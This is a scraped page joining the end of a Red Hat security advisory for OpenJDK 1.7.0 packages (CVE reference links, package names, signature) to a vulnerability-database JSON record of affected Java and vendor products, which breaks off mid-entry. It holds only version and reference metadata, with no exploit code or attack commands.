Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-1500.html https://www.redhat.com/security/data/cve/CVE-2013-1571.html https://www.redhat.com/security/data/cve/CVE-2013-2407.html https://www.redhat.com/security/data/cve/CVE-2013-2412.html https://www.redhat.com/security/data/cve/CVE-2013-2443.html https://www.redhat.com/security/data/cve/CVE-2013-2444.html https://www.redhat.com/security/data/cve/CVE-2013-2445.html https://www.redhat.com/security/data/cve/CVE-2013-2446.html https://www.redhat.com/security/data/cve/CVE-2013-2447.html https://www.redhat.com/security/data/cve/CVE-2013-2448.html https://www.redhat.com/security/data/cve/CVE-2013-2449.html https://www.redhat.com/security/data/cve/CVE-2013-2450.html https://www.redhat.com/security/data/cve/CVE-2013-2452.html https://www.redhat.com/security/data/cve/CVE-2013-2453.html https://www.redhat.com/security/data/cve/CVE-2013-2454.html https://www.redhat.com/security/data/cve/CVE-2013-2455.html https://www.redhat.com/security/data/cve/CVE-2013-2456.html https://www.redhat.com/security/data/cve/CVE-2013-2457.html https://www.redhat.com/security/data/cve/CVE-2013-2458.html https://www.redhat.com/security/data/cve/CVE-2013-2459.html https://www.redhat.com/security/data/cve/CVE-2013-2460.html https://www.redhat.com/security/data/cve/CVE-2013-2461.html https://www.redhat.com/security/data/cve/CVE-2013-2463.html https://www.redhat.com/security/data/cve/CVE-2013-2465.html https://www.redhat.com/security/data/cve/CVE-2013-2469.html https://www.redhat.com/security/data/cve/CVE-2013-2470.html https://www.redhat.com/security/data/cve/CVE-2013-2471.html https://www.redhat.com/security/data/cve/CVE-2013-2472.html https://www.redhat.com/security/data/cve/CVE-2013-2473.html https://access.redhat.com/security/updates/classification/#critical http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.10/NEWS https://rhn.redhat.com/errata/RHBA-2013-0959.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRwkhZXlSAg2UNWIIRAq8SAJ9tsW9PY39Aa6lmSLhOhlUi8hrnugCePCKO NAdLLpJKlVulPXKONu/CudU= =+H1U -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201306-0264", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 and later" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.8 and later" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 and later" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 45" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 45" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "7 update 21" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 45" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 45" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "7 update 21" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "cosminexus server - standard edition version 4", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus server - web edition version 4", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- standard edition version 4" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- web edition version 4" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "freeflow print server 93.e0.21c", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 91.d2.32", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 82.d1.44", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 81.d0.73", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.d2.33", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.c5.11", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise java sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise desktop sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": 